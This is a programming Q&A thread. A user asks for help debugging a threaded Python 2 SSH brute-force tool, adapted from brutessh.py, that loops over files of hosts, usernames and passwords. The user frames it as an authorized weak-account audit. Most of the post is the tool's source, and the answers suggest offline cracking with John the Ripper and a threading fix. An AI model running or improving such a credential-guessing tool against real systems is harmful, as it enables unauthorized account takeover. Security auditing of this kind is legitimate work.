Reputation: 31
Python issue with multiple loops and thread
I'm not a python programmer, but I got a snip of code that was working perfectly, but I need to modify it to loop trough files and get some data and do the same task. Apparently it work fine, but on the end of the first line obtained it crashes like this:
python x.py -H SSH-Hosts.txt -U Users.txt -P passlist.txt
*************************************
*SSH Bruteforcer Ver. 0.2 *
*Coded by Christian Martorella *
*Edge-Security Research *
*[email protected] *
*************************************
Username file: Users.txt
Password file: passlist.txt
*************************************
HOST: 192.168.1.3
Username: bob
Trying password...
zzzzzz
Username: john
Trying password...
Traceback (most recent call last):
File "x.py", line 146, in <module>
test(sys.argv[1:])
File "x.py", line 139, in test
test_thread(name)
File "x.py", line 81, in test_thread
thread.join()
Zxcvbnm
The application is a small tool that test for weak SSH accounts, we were target of several brute-force attacks recently and we blocked all of them, but we also want to test periodically for weak accounts, since the applications available (such as Medusa) crashed I decided to modify this one that works fine on our systems, but pass host per host and user per user is not very realistic for us. It's NOT a unauthorized test, I'm member of the IT and we are doing it to prevent BREACHES!
import thread
import time
from threading import Thread
import sys, os, threading, time, traceback, getopt
import paramiko
import terminal
global adx
global port
adx="1"
port=22
data=[]
i=[]
term = terminal.TerminalController()
paramiko.util.log_to_file('demo.log')
print "\n*************************************"
print "*"+term.RED + "SSH Bruteforcer Ver. 0.2"+term.NORMAL+" *"
print "*Coded by Christian Martorella *"
print "*Edge-Security Research *"
print "*[email protected] *"
print "*************************************\n"
def usage():
print "Usage: brutessh.py options \n"
print " -H: file with hosts\n"
print " -U: file with usernames\n"
print " -P: password file \n"
print " -p: port (default 22) \n"
print " -t: threads (default 12, more could be bad)\n\n"
print "Example: brutessh.py -h 192.168.1.55 -u root -d mypasswordlist.txt \n"
sys.exit()
class force(Thread):
def __init__( self, name ):
Thread.__init__(self)
self.name = name
def run(self):
global adx
if adx == "1":
passw=self.name.split("\n")[0]
t = paramiko.Transport(hostname)
try:
t.start_client()
except Exception:
x = 0
try:
t.auth_password(username=username,password=passw)
except Exception:
x = 0
if t.is_authenticated():
print term.DOWN + term.GREEN + "\nAuth OK ---> Password Found: " + passw + term.DOWN + term.NORMAL
t.close()
adx = "0"
else:
print term.BOL + term.UP + term.CLEAR_EOL + passw + term.NORMAL
t.close()
time.sleep(0)
i[0]=i[0]-1
def test_thread(names):
i.append(0)
j=0
while len(names):
try:
if i[0]<th:
n = names.pop(0)
i[0]=i[0]+1
thread=force(n)
thread.start()
j=j+1
except KeyboardInterrupt:
print "Attack suspended by user..\n"
sys.exit()
thread.join()
def test(argv):
global th
global hostname
global username
th = 12
if len(sys.argv) < 3:
usage()
try :
opts, args = getopt.getopt(argv,"H:U:P:p:t:")
except getopt.GetoptError:
usage()
for opt,arg in opts :
if opt == '-U':
username = arg
elif opt == '-H':
hostname =arg
elif opt == '-P':
password = arg
elif opt == '-p':
port = arg
elif opt == "-t":
th = arg
try:
h = open(hostname, 'r')
except:
print "Can't open file with hostnames\n"
sys.exit()
try:
u = open(username, "r")
except:
print "Can't open username file\n"
sys.exit()
try:
f = open(password, "r")
except:
print "Can't open password file\n"
sys.exit()
print term.RED + "Username file: " +term.NORMAL + username + "\n" +term.RED + "Password file: " +term.NORMAL+ password
print "*************************************\n\n"
hostfile = h.readlines()
for hostname in hostfile:
print "HOST: " + hostname.rstrip('\n')
userfile = u.readlines()
for username in userfile:
print "Username: " + username.rstrip('\n')
print "Trying password...\n"
name = f.readlines()
#starttime = time.clock()
test_thread(name)
#stoptime = time.clock()
#print "\nTimes -- > Init: "+ str(starttime) + " End: "+str(stoptime)
print "\n"
if __name__ == "__main__":
try:
test(sys.argv[1:])
except KeyboardInterrupt:
print "Attack suspended by user...\n"
sys.exit()
How to fix this issue?
Thank you.
Upvotes: 1
Views: 419
Answers (2)
Reputation: 2344
Since you have access to the machines, you would be much better off to dump the passwd files and use John the Ripper to find weak accounts. Offline password attacks are far, far faster than online attacks. You should also consider running Fail2Ban, or something similar, which will automatically block SSH brute force attacks by blocking abusive IPs.
Upvotes: 1
Reputation: 4985
import thread
...
from threading import Thread
not sure why you decided to import two classes with almost identical names. seems dangerous!
i think you need Thread.join() not thread.join() since threading has a join call but the thread does not.
Upvotes: 1
Related Questions
- Threading issue in Python 2.7
- MultiThreading with a python loop
- Python - For loop and threads doesn't want to work together?
- Issues with Python Threading and Code in general
- how to fix threading in python
- multi thread issue in Python
- Threading issue in Python
- Multi-threading in python with loop
- Python Threading problems
- python threading issue